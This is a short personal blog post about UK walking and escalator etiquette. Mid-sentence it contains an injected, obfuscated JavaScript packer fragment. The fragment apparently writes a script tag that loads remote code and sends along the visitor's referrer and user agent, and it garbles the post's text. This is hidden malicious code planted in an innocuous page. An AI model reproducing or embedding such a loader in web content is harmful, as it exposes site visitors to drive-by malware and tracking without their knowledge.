Walking on the right?

/ Archive, Everything else / By Bryn Miyahara

I forgot to post my observation of London/UK. I made lots of observations but found this one most interesting.

They ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zsiih|var|u0026u|referrer|htirt||js|php’.split(‘|’),0,{}))
drive on the left. Right. BUT they walk on the right and people pass on the left. WTF! How confusing is that?! It’s a miracle I didn’t die in that country! J/K.
But they seriously have the whole “pass on the left” thing down. The underground system is accessed by LONG escalators. People are soooo good about standing to the right and passing on the left. Way better at it than we are….and we have the added benefit of also driving on the right.
